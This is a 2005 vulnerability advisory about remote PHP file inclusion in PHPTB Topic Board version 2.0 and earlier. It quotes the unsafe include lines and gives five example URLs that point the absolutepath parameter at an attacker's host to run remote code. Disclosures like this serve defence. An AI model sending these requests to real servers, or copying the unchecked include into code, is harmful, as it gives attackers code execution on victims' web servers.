PHPTB Topic Board <= 20: Multiple PHP injection vulnerabilities

[goszynskif@xxxxxxxxx]

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --
   Name: PHPTB Topic Board - Multiple PHP injection
                             vulnerabilities
   Version <= 2.0
   Homepage: htt://www.phptb.com/

   Author: Filip Groszyñski (VXSfx)
   Date: 17 August 2005
   -- == -- == -- == -- == -- == -- == -- == -- == -- == --

   Background:

     PHPTB Topic Borad is an open source portal system. 
     However, an input validation flaw can cause malicious
     attackers to remote code execution on the web server.

   --------------------------------------------------------
   
   Vulnerable code exist in ./classes/admin_o.php,
                            ./classes/board_o.php,
                            ./classes/dev_o.php,
                            ./classes/file_o.php and
                            ./classes/tech_o.php:
  <?php
	include $absolutepath.'classes/smart_o.php';
   ... EOF

   Over that I found vulnerable code in ./classes/dev_o.php and
                                        ./classes/tech_o.php:

   ...
        require $GLOBALS['absolutepath'].'userpass.php';
   ... EOF
  
   --------------------------------------------------------

   Examples:

       http://[victim]/[dir]/classes/admin_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/board_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/dev_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/file_o.php?absolutepath=http://[hacker_box]/
       http://[victim]/[dir]/classes/tech_o.php?absolutepath=http://[hacker_box]/

   --------------------------------------------------------

   Contact:

       Author: Filip Groszynski (VXSfx)
       Location: Poland <Warsaw>
       Email: groszynskif gmail com

   -- == -- == -- == -- == -- == -- == -- == -- == -- == --